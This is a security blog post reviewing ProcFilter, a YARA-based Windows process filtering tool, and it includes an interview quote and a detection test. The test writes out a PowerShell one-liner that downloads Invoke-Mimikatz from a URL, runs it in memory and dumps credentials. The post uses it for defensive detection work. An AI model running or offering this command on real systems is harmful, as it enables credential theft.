Toolsmith #119 focuses on ProcFilter, a new project, just a month old as this is written, found on Github by one of my blue team members (shout-out to Ina). Brought to you by the GoDaddy Engineering crew, I see a lot of upside and potential in this project. Per it's GitHub readme, ProcFilter is "a process filtering system for Windows with built-in YARA integration. YARA rules can be instrumented with custom meta tags that tailor its response to rule matches. It runs as a Windows service and is integrated with Microsoft's ETW API, making results viewable in the Windows Event Log. Installation, activation, and removal can be done dynamically and do not require a reboot."
Malware analysts can use ProcFilter to create YARA signatures to protect Windows environments against specific threats. It's a lightweight, precise, targeted tool that does not include a large signature set. "ProcFilter is also intended for use in controlled analysis environments where custom plugins can perform artifact-specific actions."
GoDaddy's Emerson Wiley, the ProcFilter project lead provided me with valuable insight on the tool and its future.
"For us at GoDaddy the idea was to get YARA signatures deployed proactively. YARA has a lot of traction within the malware analysis community and its flexible nature makes it perfect for malware categorization. What ProcFilter brings to the table is the ability to get those signatures out there in a preventative fashion with minimal overhead. What we're saying by making this project open source is, “This is interesting to us; if it’s interesting to you then lets work together and move it forward.”
Endpoint tools don’t typically provide openness, flexibility, and extensibility so those are other areas where ProcFilter stands out. I’m passionate about creating extensible software - if people have the opportunity to implement their own ideas it’s pretty much guaranteed that you’ll be blown away by what they create. With the core of the project trending towards stability we’re going to start focusing on building plugins that do unique and interesting things with process manipulation. We’re just starting to scratch the surface there and I look forward to what comes next.
Something I haven’t mentioned elsewhere is a desire to integrate support for Python or Lua plugins. This could provide security engineers a quick, easy way to react to process and thread events. There’s a testing branch with some of these features and we’ll see where it goes."
Installation
ProcFilter integrates nicely with Git and Windows Event Logging to minimize the need for additional tools or infrastructure for rules deployment or results acquisition.
ProcFilter is a beta offering with lots of commits from Emerson. I grabbed the x64 release (debug available too) installer for the 1.0.0-beta.2 release. Installation was seamless and rapid. It runs as a service by default, you'll see ProcFilter Service via the services.msc as follows.
ProcFilter Service |
ProcFilter Use
You can also work with ProcFilter interactively via the command prompt, again with impressive flexibility. A quick procfilter -status will advise you of your running state.
ProcFilter Service |
mimikatz power_pe_injection Yara rule |
Command-line options |
As noted in our May 2015 discussion of Rekall use for hunting in-memory adversaries, an attack such as IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds should present a good opportunity for testing. Given the endless amount of red vs. blue PowerShell scenarios, this one lined up perfectly. Using a .NET webclient call, this expression grabs Invoke-Mimikatz.ps1 from @mattifestation's PowerSploit Github and runs it in memory.
Invoke-mimikatz |
The attack didn't get very far at all on Windows 10, by design, but that doesn't mean we don't want to detect such attempted abuses in our environment, even if unsuccessful.
Detect
You can use command-line options to sweep broadly or target a specific process. In this case, I was able to reasonably assert (good job, Russ) that the PowerShell process might be the culprit. Sheer genius, I know. :-)
Suspect process |
Running procfilter -memoryscan 10612 came through like a champ.
Command-line ProcFilter detection |
The result, as dictated in part by your procfilter.ini configuration should like something like the following, once you trigger an event that matches one of your Yara rules.
ProcFilter event log view |
Great stuff from the GoDaddy Engineering team, I see significant promise in ProcFilter and really look forward to its continued support and development. Thanks to Emerson Wiley for all his great feedback.
Ping me via email or Twitter if you have questions: russ at holisticinfosec dot org or @holisticinfosec.
Cheers…until next time, for the big decade anniversary edition.
2 comments:
Windows XP Pro. Tecra M5 Centrino duo
I used msconfig.
I stop all services that are possible, of remaining exe s running used procexp to see if anything is accessing that dll – nothing.
I have tried running dotnetfx in Safe mode and Safe mode with networking, I have used the cleaning tool mentioned here.
still it says Always Microsoft.VisualBasic.Vsa.dll: Access denied.
Obviously some evil skulldugery is occuring to get .net2.0 installed – well it ain’t working.
This system already has vs.2003 installed,ie .net1.1, I shouldn’t have to uninstall that should I? (reinstalled that, numerous times as well over past)
advanced windows tips and tricks
I'll leave the fact that you're still using Windows XP alone :-)
Per https://github.com/godaddy/procfilter: ProcFilter is compatible with Windows 7+ and Windows Server 2008+ systems.
Post a Comment